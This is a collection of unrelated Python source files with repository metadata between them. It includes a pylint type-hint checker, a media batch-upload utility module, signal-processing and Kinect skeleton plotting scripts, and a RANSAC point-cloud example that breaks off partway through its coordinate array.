        # Reset per-module state; matchers depend on which platform file this is.
        self._function_matchers = []
        self._class_matchers = []
        if (module_platform := _get_module_platform(node.name)) is None:
            return
        # Platform modules (sensor.py, switch.py, ...) share common setup hooks.
        if module_platform in _PLATFORMS:
            self._function_matchers.extend(_FUNCTION_MATCH["__any_platform__"])
        if function_matches := _FUNCTION_MATCH.get(module_platform):
            self._function_matchers.extend(function_matches)
        if class_matches := _CLASS_MATCH.get(module_platform):
            self._class_matchers.extend(class_matches)
        # Inherited-property matchers are normally mypy's job; only checked
        # here when the user disabled ignore-missing-annotations.
        if not self.linter.config.ignore_missing_annotations and (
            property_matches := _INHERITANCE_MATCH.get(module_platform)
        ):
            self._class_matchers.extend(property_matches)

    def visit_classdef(self, node: nodes.ClassDef) -> None:
        """Called when a ClassDef node is visited."""
        ancestor: nodes.ClassDef
        # Rules attach to any class that inherits from a matched base class.
        for ancestor in node.ancestors():
            for class_matches in self._class_matchers:
                if ancestor.name == class_matches.base_class:
                    self._visit_class_functions(node, class_matches.matches)

    def _visit_class_functions(
        self, node: nodes.ClassDef, matches: list[TypeHintMatch]
    ) -> None:
        """Check each method of *node* against every applicable matcher."""
        for match in matches:
            for function_node in node.mymethods():
                if match.need_to_check_function(function_node):
                    self._check_function(function_node, match)

    def visit_functiondef(self, node: nodes.FunctionDef) -> None:
        """Called when a FunctionDef node is visited."""
        for match in self._function_matchers:
            # Module-level functions only; methods are handled via visit_classdef.
            if not match.need_to_check_function(node) or node.is_method():
                continue
            self._check_function(node, match)

    # Async functions share the exact same checking logic.
    visit_asyncfunctiondef = visit_functiondef

    def _check_function(self, node: nodes.FunctionDef, match: TypeHintMatch) -> None:
        """Emit messages for any annotation of *node* that violates *match*."""
        # Check that at least one argument is annotated.
        annotations = _get_all_annotations(node)
        if (
            self.linter.config.ignore_missing_annotations
            and node.returns is None
            and not _has_valid_annotations(annotations)
        ):
            return
        # Check that all positional arguments are correctly annotated.
        if match.arg_types:
            for key, expected_type in match.arg_types.items():
                if not _is_valid_type(expected_type, annotations[key]):
                    self.add_message(
                        "hass-argument-type",
                        node=node.args.args[key],
                        args=(key + 1, expected_type),
                    )
        # Check that all keyword arguments are correctly annotated.
        if match.named_arg_types is not None:
            for arg_name, expected_type in match.named_arg_types.items():
                arg_node, annotation = _get_named_annotation(node, arg_name)
                if arg_node and not _is_valid_type(expected_type, annotation):
                    self.add_message(
                        "hass-argument-type",
                        node=arg_node,
                        args=(arg_name, expected_type),
                    )
        # Check that kwargs is correctly annotated.
        if match.kwargs_type and not _is_valid_type(
            match.kwargs_type, node.args.kwargannotation
        ):
            self.add_message(
                "hass-argument-type",
                node=node,
                args=(node.args.kwarg, match.kwargs_type),
            )
        # Check the return type.
        if not _is_valid_return_type(match, node.returns):
            self.add_message(
                "hass-return-type", node=node, args=match.return_type or "None"
            )
def register(linter: PyLinter) -> None:
    """Register the checker."""
    # Entry point pylint calls when loading this module as a plugin.
    linter.register_checker(HassTypeHintChecker(linter))
| [
"noreply@github.com"
] | jrester.noreply@github.com |
a93f9f3fc208ecc059ef85f1484d2adbf4c9118e | 7c44527115fce603fc79d56cac264c7b3d90f6fa | /may20/ClassIntro.py | e984aaf4886008cf93cbbe6fbb202cb7137e9fac | [] | no_license | Hubwithgit89/PythonLearn | 299c7fdf3d632dcb5f1dc9813b0b725165b08bad | f9bb5f23be7d11e58f129b1263ca8e7e91c396fd | refs/heads/master | 2020-05-22T08:54:08.499508 | 2019-07-24T01:55:11 | 2019-07-24T01:55:11 | 186,288,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py |
class computer:
def disp(self):
print("disp method")
c1=computer()
c2=computer()
#computer.disp(c1);
#c2.disp();
| [
"xyz@xyz.com"
] | xyz@xyz.com |
5eb2854dd85d73cec4c62e1be6a4ba968b2ef2ff | 46b49480433d5a391c65b1b63cca89951f4ae228 | /dpa/ptask/action/source.py | 791569bd4dbb927b29d073a3df1f738bb1fac670 | [
"MIT"
] | permissive | wildparky/dpa-pipe | 5e8c86b0d5846da8886ee0a11adc689b912aee69 | 7a2e413ce958cdf56e8b9fab27a4f52fbee40480 | refs/heads/master | 2020-12-25T12:41:27.912856 | 2016-01-11T21:04:39 | 2016-01-11T21:04:39 | 51,695,472 | 1 | 0 | null | 2016-02-14T13:21:40 | 2016-02-14T13:21:39 | null | UTF-8 | Python | false | false | 1,820 | py |
# ----------------------------------------------------------------------------
# Imports:
# ----------------------------------------------------------------------------
from dpa.action import Action, ActionError
from dpa.ptask.action.sync import _PTaskSyncAction
from dpa.location import current_location_code
from dpa.shell.output import Style
# ----------------------------------------------------------------------------
# Classes:
# ----------------------------------------------------------------------------
class PTaskSourceAction(_PTaskSyncAction):
    """Source the contents of one ptask into another."""

    # ------------------------------------------------------------------------
    def execute(self):
        """Run the underlying sync, then report what was sourced.

        Any sync failure is re-raised as an ActionError with a clearer
        "Unable to source ptask" prefix.  (Python 2 print statements.)
        """
        try:
            super(PTaskSourceAction, self).execute()
        except ActionError as e:
            raise ActionError("Unable to source ptask: " + str(e))
        else:
            print "\nSuccessfully sourced: ",
            # No explicit source version means the latest version was used.
            if self.source_version:
                print Style.bright + str(self.source_version.spec) + \
                    Style.reset + "\n"
            else:
                print Style.bright + str(self.source.spec) + " [latest]" + \
                    Style.reset + "\n"

    # ------------------------------------------------------------------------
    def validate(self):
        """Validate sync arguments, then require the destination to be local.

        Raises ActionError when the destination location differs from the
        current location.
        """
        super(PTaskSourceAction, self).validate()

        # ---- make sure the destination location is the current location.

        cur_loc_code = current_location_code()

        if self.destination_version:
            dest_loc_code = self.destination_version.location_code
        else:
            dest_loc_code = self.destination_latest_version.location_code

        if cur_loc_code != dest_loc_code:
            raise ActionError("Destination location must be this location.")
| [
"jtomlin@clemson.edu"
] | jtomlin@clemson.edu |
c06c295fc1a99c5979dcd1e08b6dd0f89b72aa60 | 56146d194e0952072e0124f611a556e79f52cd68 | /api/lib/python3.6/site-packages/marshmallow/__init__.py | c3d3b33e7c64503757999c1fc453199ff011b098 | [] | no_license | tin0819tin/DS_Tutor | 94ef45fffffde47c6585f6fa691a293f449474ef | 0c7c9f0b602b7f9c8d8363de09b9e956f915e01a | refs/heads/master | 2023-06-07T05:03:50.503960 | 2021-07-05T14:04:32 | 2021-07-05T14:04:32 | 378,444,479 | 11 | 1 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | from marshmallow.schema import Schema, SchemaOpts
from . import fields
from marshmallow.decorators import (
pre_dump,
post_dump,
pre_load,
post_load,
validates,
validates_schema,
)
from marshmallow.utils import EXCLUDE, INCLUDE, RAISE, pprint, missing
from marshmallow.exceptions import ValidationError
from distutils.version import LooseVersion
__version__ = "3.12.1"
__version_info__ = tuple(LooseVersion(__version__).version)
__all__ = [
"EXCLUDE",
"INCLUDE",
"RAISE",
"Schema",
"SchemaOpts",
"fields",
"validates",
"validates_schema",
"pre_dump",
"post_dump",
"pre_load",
"post_load",
"pprint",
"ValidationError",
"missing",
]
| [
"b06502141@g.ntu.edu.tw"
] | b06502141@g.ntu.edu.tw |
544bed584ee4c7f6bd3980047a5998b742301ca1 | f39dfb5b634410851f276b065c926b4cf42ae078 | /figuras/PycharmKayStatisticalReport/example_8_13_v3.py | 387438da443b9558918e9917eba8bfa4ce87f35f | [
"MIT"
] | permissive | santoshmore85/estudiando_el_kay | 9fc57d2bbd884a4188a93a15a00436947d60338f | 787f9b2599efeea93c1cf67408edcf1fa199c9b7 | refs/heads/main | 2023-08-26T23:05:00.701166 | 2021-10-29T21:49:08 | 2021-10-29T21:49:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,048 | py | import matplotlib.pyplot as plt
import numpy as np
import math
from matplotlib import rc
from matplotlib import rcParams
__author__ = 'ernesto'
# if use latex or mathtext
rc('text', usetex=True)
rcParams['text.latex.preamble'] = [r"\usepackage{amsmath}"]
# Parámetros
# número de muestras
N = 100
# número de parámetros
p = 2
# factor de olvido
lamb = 0.85
# condiciones iniciales
theta_i = np.zeros((p, ))
sigma_i = 1e5 * np.eye(p)
# señal de referencia (frecuencia, amplitud y fase)
omega_r = 2 * math.pi * 0.1
a_r = 1
p_r = 0
# señal de interferencia (frecuencia, amplitud y fase)
omega_i = omega_r
n = np.arange(N)
a_i = 10 * (1 + 0.5 * np.cos(2 * math.pi * n / N))
p_i = math.pi / 4
# Construcción de las señales
# referencia e interferencia
x_i = a_i * np.cos(omega_i * n + p_i)
x_r = a_r * np.cos(omega_r * n + p_r)
# estimador en cada paso
theta_n = np.zeros((N, p))
error = np.zeros((N, ))
y_r = np.zeros((N, ))
# Procesamiento
theta = theta_i
sigma = sigma_i
x_r_pad = np.concatenate((np.zeros((p - 1,)), x_r))
for i in n:
h = x_r_pad[i + (p - 1): i - 1 if i - 1 >= 0 else None: -1]
e = x_i[i] - theta @ h
K = (sigma @ h) / (lamb ** i + h @ sigma @ h)
theta = theta + K * e
sigma = (np.eye(p) - K[:, None] @ h[None, :]) @ sigma
theta_n[i, :] = theta
error[i] = x_i[i] - theta @ h
y_r[i] = theta @ h
# valores verdaderos
h1 = -a_i * math.sin(math.pi/4) / math.sin(math.pi/5)
h0 = a_i * math.cos(math.pi/4) - h1 * math.cos(math.pi/5)
#print("h[0] = {0:f}, h[1] = {1:f}".format(h0, h1))
ms = 3
fs = 12
ymax = 16
fig = plt.figure(0, figsize=(9, 6), frameon=False)
ax = plt.subplot2grid((9, 1), (0, 0), rowspan=3, colspan=1)
plt.xlim(0, N-1)
plt.ylim(-ymax, ymax)
plt.plot(n, x_i, linestyle='-', color='k', marker='s', markersize=ms, label='$x[n]$')
plt.plot(n, y_r, linestyle='-', color='r', marker='s', markersize=ms, label='$\hat{x}[n]$')
ax.set_xticklabels([])
leg = plt.legend(loc='center', bbox_to_anchor=(0.5, 0.83), frameon=False, fontsize=fs)
ax = plt.subplot2grid((9, 1), (3, 0), rowspan=3, colspan=1)
plt.xlim(0, N-1)
plt.ylim(-ymax, ymax)
plt.plot(n, error, linestyle='-', marker='s', color='k', markersize=ms, lw=1)
ax.set_xticklabels([])
ax.set_ylabel(r'$\epsilon[n]=x[n]-\hat{x}[n]$', fontsize=fs)
ax = plt.subplot2grid((9, 1), (6, 0), rowspan=3, colspan=1)
# e = hd-h_est
plt.xlim(0, N-1)
plt.plot(n, theta_n[:, 0], linestyle='-', color='k', marker='s', markersize=ms, label='$\hat{h}_n[0]$')
plt.plot(n, theta_n[:, 1], linestyle='-', color='r', marker='s', markersize=ms, label='$\hat{h}_n[1]$')
plt.plot(n, h0, linestyle='--', lw=1, color='grey')
plt.plot(n, h1, linestyle='--', lw=1, color='grey')
ax.set_xlabel(r'$n$', fontsize=fs)
ax.set_ylabel('${\\rm Par\\acute{a}metros\;del\;filtro}$', fontsize=fs)
leg = plt.legend(loc='best', frameon=False, fontsize=fs)
plt.savefig('example_8_13.pdf', bbox_inches='tight')
fig = plt.figure(1, figsize=(9, 5), frameon=False)
plt.plot(n[p:], x_i[p:] - y_r[p:], linestyle='-', color='k', marker='s', markersize=ms)
plt.show()
| [
"bor9net@gmail.com"
] | bor9net@gmail.com |
0628aa82dbbfc7c5f2e2f5a771367e64427daa55 | 3e59eb1efdc6463f33e6e62f448555b3b2fa6913 | /odd_even.py | 581896433feb1541bae6b98feca1a027b5642a4d | [] | no_license | vydg5/Pythone_exercises | de16a94dcb4b04914a65e240bdaf22515122f910 | 1fd31e3ac140b802fd514f5d04838f936a71d4cf | refs/heads/master | 2021-01-10T01:33:38.701143 | 2016-03-02T16:09:47 | 2016-03-02T16:09:47 | 52,327,192 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Feb 22 20:21:46 2016
@author: Vireak
"""
number = int(input("Enter a number: "))
rest = number % 4
if rest==0:
print("this is an even and multiple of 4 number")
elif rest == 2:
print("this is just an even number")
else:
print("this is an odd number")
num, check = input("Enter two numbers here: ").split()
rest1 = int(check) % int(num)
if rest1 == 0:
print("number is divided nicely by check")
else:
print("number is NOT divided nicely by check") | [
"vydg5@mail.missouri.edu"
] | vydg5@mail.missouri.edu |
610fea3b4461cc6a131728081658f9e4f032d4c5 | 0799030f0bf9359d52787f6bdfc1e25c77aafa4a | /omca/apps/uploadmedia/utils.py | fd09cf544399f87eda4ec70421d0848a7b6c9d88 | [] | no_license | OaklandMuseum/webapps | 7fd17731d99b0c354519e15fdd820df3129c8aea | 828be7a79caf7766226db179e23900c46b0ac592 | refs/heads/master | 2023-01-09T16:54:37.253459 | 2023-01-02T17:51:18 | 2023-01-02T17:51:18 | 62,816,222 | 0 | 1 | null | 2023-01-02T17:51:19 | 2016-07-07T15:07:26 | Python | UTF-8 | Python | false | false | 12,359 | py | from PIL import Image
from PIL.ExifTags import TAGS
import csv
import codecs
import re
import json
import logging
from os import path, listdir
from os.path import isfile, isdir, join
from xml.sax.saxutils import escape
from common import cspace # we use the config file reading function
from common.utils import deURN, loginfo
from cspace_django_site import settings
config = cspace.getConfig(path.join(settings.BASE_DIR, 'config'), 'uploadmedia')
TEMPIMAGEDIR = config.get('files', 'directory')
POSTBLOBPATH = config.get('info', 'postblobpath')
BATCHPARAMETERS = config.get('info', 'batchparameters')
BATCHPARAMETERS = BATCHPARAMETERS.replace('.cfg', '')
SERVERLABEL = config.get('info', 'serverlabel')
SERVERLABELCOLOR = config.get('info', 'serverlabelcolor')
INSTITUTION = config.get('info', 'institution')
FIELDS2WRITE = 'name size objectnumber date creator contributor rightsholder imagenumber handling approvedforweb'.split(' ')
if isdir(TEMPIMAGEDIR):
loginfo('bmu',"Using %s as working directory for images and metadata files" % TEMPIMAGEDIR, {}, {})
else:
loginfo('bmu',"%s is not an existing directory, using /tmp instead" % TEMPIMAGEDIR, {}, {})
TEMPIMAGEDIR = '/tmp'
JOBDIR = path.join(TEMPIMAGEDIR, '%s')
# Get an instance of a logger, log some startup info
logger = logging.getLogger(__name__)
def getJobfile(jobnumber):
return JOBDIR % jobnumber
def jobsummary(jobstats):
# [ n_imagesuploaded, n_imagesingested, n_errors, [ list of images in error ]
result = [0, 0, 0, [], 'completed']
for jobname, status, count, imagefilenames in jobstats:
if 'pending' in status:
result[0] = count - 1
result[4] = 'pending'
elif 'submitted' in status or 'job started' in status:
result[0] = count - 1
inputimages = imagefilenames
elif 'ingested' in status or 'in progress' in status:
result[1] = count - 1
ingestedimages = imagefilenames
if 'job started' in status or 'in progress' in status:
result[4] = 'in progress'
# compute discrepancy, if any
result[2] = result[0] - result[1]
if result[2] > 0 and result[4] == 'completed':
result[4] = 'problem'
try:
result[3] = [image for image in inputimages if image not in ingestedimages and image != 'name']
except:
pass
return result
def getJoblist(request):
if 'num2display' in request.POST:
num2display = int(request.POST['num2display'])
else:
num2display = 50
jobpath = JOBDIR % ''
filelist = [f for f in listdir(jobpath) if isfile(join(jobpath, f)) and ('.csv' in f or 'trace.log' in f)]
jobdict = {}
errors = []
filelist = sorted(filelist, reverse=True)
for f in sorted(filelist, reverse=True):
if len(jobdict.keys()) > num2display:
pass
imagefilenames = []
else:
# we only need to count lines if the file is with range...
linecount, imagefilenames = checkFile(join(jobpath, f))
parts = f.split('.')
if 'original' in parts[1]:
status = 'submitted'
elif 'processed' in parts[1]:
status = 'ingested'
elif 'inprogress' in parts[1]:
status = 'job started'
elif 'step1' in parts[1]:
status = 'pending'
elif 'step2' in parts[1]:
continue
# we are in fact keeping the step2 files for now, but let's not show them...
# elif 'step2' in parts[1]: status = 'blobs in progress'
elif 'step3' in parts[1]:
status = 'media in progress'
elif 'trace' in parts[1]:
status = 'run log'
elif 'check' in parts[1]:
status = 'check'
else:
status = 'unknown'
jobkey = parts[0]
if not jobkey in jobdict: jobdict[jobkey] = []
jobdict[jobkey].append([f, status, linecount, imagefilenames])
joblist = [[jobkey, True, jobdict[jobkey], jobsummary(jobdict[jobkey])] for jobkey in
sorted(jobdict.keys(), reverse=True)]
for ajob in joblist:
for image in ajob[3][3]:
errors.append([ajob[0], image])
for state in ajob[2]:
if state[1] in ['ingested', 'pending', 'job started']: ajob[1] = False
num_jobs = len(joblist)
return joblist[0:num2display], errors, num_jobs, len(errors)
def checkFile(filename):
file_handle = open(filename)
# eliminate rows for which an object was not found...
lines = [l for l in file_handle.read().splitlines() if "not found" not in l]
images = [f.split("\t")[0] for f in lines]
images = [f.split("|")[0] for f in images]
return len(lines), images
def getQueue(jobtypes):
return [x for x in listdir(JOBDIR % '') if '%s.csv' % jobtypes in x]
def getBMUoptions():
allowintervention = config.get('info', 'allowintervention')
allowintervention = True if allowintervention.lower() == 'true' else False
bmuoptions = []
bmuconstants = {}
try:
usebmuoptions = config.get('info', 'usebmuoptions')
usebmuoptions = True if usebmuoptions.lower() == 'true' else False
except:
usebmuoptions = False
if usebmuoptions:
try:
bmuoptions = config.get('info', 'bmuoptions')
bmuoptions = json.loads(bmuoptions.replace('\n', ''))
except:
loginfo('bmu',"Could not find or could not parse BMU options (parameter 'bmuoptions'), defaults will be taken!", {}, {})
if bmuoptions: loginfo('',bmuoptions, {}, {})
bmuoptions = []
# a dict of dicts...
try:
bmuconstants = config.get('info', 'bmuconstants')
bmuconstants = json.loads(bmuconstants.replace('\n', ''))
except:
loginfo('bmu',"Could not find or could not parse BMU constants (parameter 'bmuconstants'), none will be inserted into media records!", {}, {})
if bmuconstants: loginfo('',bmuconstants, {}, {})
bmuconstants = {}
# add the columns for these constants to the list of output values
for imagetypes in bmuconstants.keys():
for constants in bmuconstants[imagetypes].keys():
if not constants in FIELDS2WRITE:
FIELDS2WRITE.append(constants)
else:
loginfo('bmu',"No BMU options are not enabled. No defaults or special handling of media.", {}, {})
try:
overrides = config.get('info', 'overrides')
overrides = json.loads(overrides.replace('\n', ''))
for o in overrides:
loginfo('bmu','BMU will attempt to configure overrides for %s' % o[0], {}, {})
except:
loginfo('bmu',"Could not find or could not parse BMU overrides (parameter 'overrides'). Please check your JSON!", {}, {})
overrides = []
for override in overrides:
if not override[2] in FIELDS2WRITE:
FIELDS2WRITE.append(override[2])
for override in overrides:
if override[1] == 'dropdown':
dropdown = ''
try:
dropdown = config.get('info', override[2] + 's')
dropdown = json.loads(dropdown)
override.append(dropdown)
loginfo('bmu','BMU override configured for %ss' % override[2], {}, {})
except:
loginfo('bmu','Could not parse overrides for %ss, please check your JSON.' % override[2], {}, {})
if dropdown: loginfo('bmu',dropdown, {}, {})
else:
# add an empty dropdown element -- has to be a dict
loginfo('bmu','BMU override configured for %s' % override[2], {}, {})
override.append({})
return {
'allowintervention': allowintervention,
'usebmuoptions': usebmuoptions,
'bmuoptions': bmuoptions,
'bmuconstants': bmuconstants,
'overrides': overrides
}
# following function taken from stackoverflow and modified...thanks!
def get_exif(fn):
ret = {}
if 'image' in fn.content_type:
i = Image.open(fn)
try:
info = i._getexif()
for tag, value in info.items():
decoded = TAGS.get(tag, tag)
ret[decoded] = value
except:
pass
else:
pass
return ret
def getCSID(objectnumber):
# dummy function, for now
objectCSID = objectnumber
return objectCSID
def writeCsv(filename, items, writeheader):
filehandle = codecs.open(filename, 'w', 'utf-8')
writer = csv.writer(filehandle, delimiter='|')
writer.writerow(writeheader)
for item in items:
row = []
for x in writeheader:
if x in item.keys():
cell = str(item[x])
cell = cell.strip()
cell = cell.replace('"', '')
cell = cell.replace('\n', '')
cell = cell.replace('\r', '')
else:
cell = ''
row.append(cell)
writer.writerow(row)
filehandle.close()
# following function borrowed from Django docs, w modifications
def handle_uploaded_file(f):
destination = open(path.join(TEMPIMAGEDIR, '%s') % f.name, 'wb')
with destination:
for chunk in f.chunks():
destination.write(chunk)
destination.close()
def assignValue(defaultValue, override, imageData, exifvalue, refnameList):
# oh boy! these next couple lines are doozies! sorry!
if type(refnameList) == type({}):
refName = refnameList.get(defaultValue, defaultValue)
else:
refName = [z[1] for z in refnameList if z[0] == defaultValue]
# should never happen that there is more than one match, but the configurer may have made a boo-boo
if len(refName) == 1:
refName = refName[0]
else:
refName = defaultValue
if override == 'always':
return defaultValue, refName
elif exifvalue in imageData:
imageValue = imageData[exifvalue]
# a bit of cleanup
imageValue = imageValue.strip()
imageValue = imageValue.replace('"', '')
imageValue = imageValue.replace('\n', '')
imageValue = imageValue.replace('\r', '')
imageValue = escape(imageValue)
return imageValue, refName
# the follow is really the 'ifblank' condition
else:
return defaultValue, refName
# this somewhat desperate function makes an html table from a tab- and newline- delimited string
def reformat(filecontent):
result = deURN(filecontent)
result = result.replace('\n','<tr><td>')
result = result.replace('\t','<td>')
result = result.replace('|','<td>')
result = result.replace('False','<span class="error">False</span>')
result += '</table>'
return '<table width="100%"><tr><td>\n' + result
# this somewhat desperate function makes an grid display from 'processed' files
def rendermedia(filecontent):
result = deURN(filecontent)
rows = result.split('\n')
FIELDS = rows[0].strip().split('\t')
rows = rows[1:]
result = []
for counter, row in enumerate(rows):
row = row.strip() # seems there may be a stray \r still at the end of the string.
if row == '' or row[0] == '#': continue
row = row.split('\t')
media = {'otherfields': []}
media['counter'] = counter
for i,r in enumerate(row):
if FIELDS[i] == 'objectnumber':
media['accession'] = row[i]
elif FIELDS[i] == 'name':
media['mainentry'] = row[i]
# media['otherfields'].append({'label': 'File', 'value': row[i]})
elif FIELDS[i] == 'objectCSID':
media['csid'] = row[i]
elif FIELDS[i] == 'mediaCSID':
media['media'] = row[i]
elif FIELDS[i] == 'blobCSID':
media['blobs'] = [ row[i] ]
elif FIELDS[i] == 'creator':
media['otherfields'].append({'label': 'Creator', 'value': row[i]})
elif FIELDS[i] == 'description':
media['otherfields'].append({'label': 'Description', 'value': row[i]})
elif FIELDS[i] == 'date':
media['otherfields'].append({'label': 'Image Date', 'value': row[i]})
result.append(media)
return result
| [
"johnblowe@gmail.com"
] | johnblowe@gmail.com |
674c892252bf0176e34f9f68ac18b547e3c23726 | 04674353730c9f76bd0af43d6380af5bc35d9773 | /pyqt-official/scripts/kinectData/plotSkeleton.py | bba34bfed4a652551a2819c9d63ced816264efcc | [] | no_license | CenturyLiu/EECS467_Final_GUI | 673a4507880f41558111f16a9f82b086fff654a5 | be1444afb38f4f4b461de987cab262d95139ff16 | refs/heads/main | 2023-04-23T05:55:46.378532 | 2021-04-29T21:16:58 | 2021-04-29T21:16:58 | 359,838,000 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,452 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 28 15:02:02 2021
@author: ShaoxiongYao
"""
import json
from mpl_toolkits import mplot3d
import matplotlib.pyplot as plt
# bonePairList = [
# ["LHip", "LKnee"], ["RHip", "RKnee"],
# ["HipCenter", "LHip"], ["HipCenter", "RHip"],
# ["HipCenter", "ShoulderCenter"], ["ShoulderCenter", "Head"],
# ["ShoulderCenter", "LShoulder"], ["LShoulder", "LElbow"], ["LElbow", "LWrist"],
# ["ShoulderCenter", "RShoulder"], ["RShoulder", "RElbow"], ["RElbow", "RWrist"]
# ]
bonePairList = [
["HipCenter", "ShoulderCenter"], ["ShoulderCenter", "Head"],
["ShoulderCenter", "LShoulder"], ["LShoulder", "LElbow"], ["LElbow", "LWrist"],
["ShoulderCenter", "RShoulder"], ["RShoulder", "RElbow"], ["RElbow", "RWrist"]
]
def draw_skeleton(skeletonData, ax=None):
if ax is None:
fig = plt.figure(frameon=False)
ax = fig.add_subplot(111, projection='3d')
else:
ax = ax
for bonePair in bonePairList:
jointName1, jointName2 = bonePair
if jointName1 in skeletonData.keys() and jointName2 in skeletonData.keys():
jointPosition1 = skeletonData[jointName1]
jointPosition2 = skeletonData[jointName2]
# before data transformation
# ax.plot([-jointPosition1[2], -jointPosition2[2]],
# [-jointPosition1[0], -jointPosition2[0]],
# [jointPosition1[1], jointPosition2[1]],
# color='r', linestyle='-', linewidth=2, marker='o', markersize=5)
# after data transformation
ax.plot([jointPosition1[0], jointPosition2[0]],
[jointPosition1[1], jointPosition2[1]],
[jointPosition1[2], jointPosition2[2]],
color='r', linestyle='-', linewidth=2, marker='o', markersize=5)
return ax
if __name__ == '__main__':
skeletonDataList = None
with open('skeletonApr-10-22-21.json', 'r') as f:
skeletonDataList = json.load(f)
fig = plt.figure()
ax = plt.axes(projection='3d', )
try:
for skeletonData in skeletonDataList:
draw_skeleton(skeletonData, ax=ax)
ax.set_xlim(-4, -2)
ax.set_ylim(-1, 1)
ax.set_zlim(-1, 1)
plt.pause(0.3)
plt.cla()
except KeyboardInterrupt:
print("Stopped, received keyboad interrupt")
| [
"williamyao@sjtu.edu.cn"
] | williamyao@sjtu.edu.cn |
38038a954baf0435cc4b0471fb337429e94d0cc5 | 50a39c462fac7e889f6257cc2c3e3c84986e4bb2 | /RANSAC_example.py | b25e7be454f49d1f4943e0a29be496fb6270413e | [] | no_license | chickenbestlover/MSDN2 | 2b16f70eb58bcc67893ec65ed1a58db3f0dd79a9 | 58a0c6aa8e8e8953572567145ffecd5b10bdfb5a | refs/heads/master | 2020-03-25T07:37:54.873304 | 2018-11-05T05:46:02 | 2018-11-05T05:46:02 | 143,572,068 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,701 | py | import numpy as np
import pcl
points = np.array([[ 594.6663 , -1617.9456 , -797.36224],
[ 600.5656 , -1638.1005 , -806.5441 ],
[ 599.16583, -1638.3135 , -805.9235 ],
[ 597.76605, -1638.5264 , -805.3029 ],
[ 596.36633, -1638.7394 , -804.6823 ],
[ 594.96655, -1638.9523 , -804.06165],
[ 593.5668 , -1639.1652 , -803.44104],
[ 592.16705, -1639.3782 , -802.82043],
[ 590.7673 , -1639.5911 , -802.1998 ],
[ 589.36755, -1639.804 , -801.5792 ],
[ 587.9678 , -1640.017 , -800.9586 ],
[ 586.568 , -1640.2299 , -800.338 ],
[ 595.3116 , -1618.2574 , -796.01373],
[ 601.2189 , -1638.4161 , -805.1791 ],
[ 599.8191 , -1638.6292 , -804.5585 ],
[ 598.4193 , -1638.842 , -803.9378 ],
[ 597.0196 , -1639.055 , -803.3172 ],
[ 595.6198 , -1639.268 , -802.6966 ],
[ 594.22003, -1639.4808 , -802.076 ],
[ 592.8203 , -1639.6938 , -801.4554 ],
[ 591.42053, -1639.9067 , -800.8348 ],
[ 590.0208 , -1640.1196 , -800.2142 ],
[ 588.62103, -1640.3326 , -799.5935 ],
[ 587.22125, -1640.5455 , -798.9729 ],
[ 595.9569 , -1618.5692 , -794.6653 ],
[ 598.22314, -1628.7557 , -798.9331 ],
[ 596.8319 , -1628.9674 , -798.3162 ],
[ 599.0726 , -1639.1577 , -802.57275],
[ 597.67285, -1639.3707 , -801.95215],
[ 596.2731 , -1639.5836 , -801.33154],
[ 594.8733 , -1639.7965 , -800.71094],
[ 593.4736 , -1640.0095 , -800.0903 ],
[ 592.0738 , -1640.2224 , -799.46967],
[ 590.674 , -1640.4353 , -798.84906],
[ 589.2743 , -1640.6483 , -798.22845],
[ 584.31067, -1630.8721 , -792.7647 ],
[ 600.2637 , -1628.8579 , -798.1932 ],
[ 598.87244, -1629.0695 , -797.5763 ],
[ 597.4812 , -1629.2811 , -796.9595 ],
[ 599.7258 , -1639.4734 , -801.2077 ],
[ 598.3261 , -1639.6864 , -800.5871 ],
[ 596.92633, -1639.8993 , -799.96643],
[ 595.52655, -1640.1122 , -799.3458 ],
[ 594.12683, -1640.3252 , -798.7252 ],
[ 592.72705, -1640.5381 , -798.1046 ],
[ 587.74243, -1630.7626 , -792.6416 ],
[ 586.3512 , -1630.9742 , -792.0248 ],
[ 584.95996, -1631.1859 , -791.4079 ],
[ 600.91296, -1629.1716 , -796.83636],
[ 599.5217 , -1629.3833 , -796.21954],
[ 598.1305 , -1629.5948 , -795.6027 ],
[ 596.7392 , -1629.8065 , -794.98584],
[ 595.34796, -1630.0182 , -794.369 ],
[ 593.9567 , -1630.2299 , -793.7522 ],
[ 592.5655 , -1630.4414 , -793.1353 ],
[ 591.17426, -1630.6531 , -792.5185 ],
[ 589.78296, -1630.8647 , -791.9017 ],
[ 588.3917 , -1631.0764 , -791.28485],
[ 587.0005 , -1631.288 , -790.66797],
[ 585.60925, -1631.4996 , -790.05115],
[ 601.56226, -1629.4854 , -795.4796 ],
[ 600.171 , -1629.697 , -794.8628 ],
[ 598.7797 , -1629.9087 , -794.2459 ],
[ 597.3885 , -1630.1202 , -793.6291 ],
[ 595.99725, -1630.3319 , -793.01227],
[ 594.606 , -1630.5436 , -792.3954 ],
[ 593.2148 , -1630.7552 , -791.77856],
[ 591.82355, -1630.9668 , -791.16174],
[ 590.43225, -1631.1785 , -790.54486],
[ 589.041 , -1631.3901 , -789.92804],
[ 587.6498 , -1631.6018 , -789.3112 ],
[ 586.25854, -1631.8134 , -788.6944 ],
[ 598.53815, -1619.8167 , -789.27136],
[ 597.15546, -1620.027 , -788.6583 ],
[ 595.7727 , -1620.2373 , -788.0452 ],
[ 598.0378 , -1630.4341 , -792.27234],
[ 596.64655, -1630.6456 , -791.65546],
[ 595.2553 , -1630.8573 , -791.03864],
[ 593.8641 , -1631.069 , -790.4218 ],
[ 592.4728 , -1631.2806 , -789.80493],
[ 591.08154, -1631.4922 , -789.1881 ],
[ 589.6903 , -1631.7039 , -788.5713 ],
[ 588.2991 , -1631.9155 , -787.9544 ],
[ 583.32806, -1622.1304 , -782.52765],
[ 599.1835 , -1620.1284 , -787.9229 ],
[ 597.8007 , -1620.3387 , -787.3098 ],
[ 596.418 , -1620.5491 , -786.6968 ],
[ 598.6871 , -1630.7478 , -790.9155 ],
[ 597.29584, -1630.9595 , -790.2987 ],
[ 595.9046 , -1631.171 , -789.6819 ],
[ 594.5133 , -1631.3827 , -789.065 ],
[ 593.1221 , -1631.5944 , -788.4482 ],
[ 588.1216 , -1621.8112 , -783.0184 ],
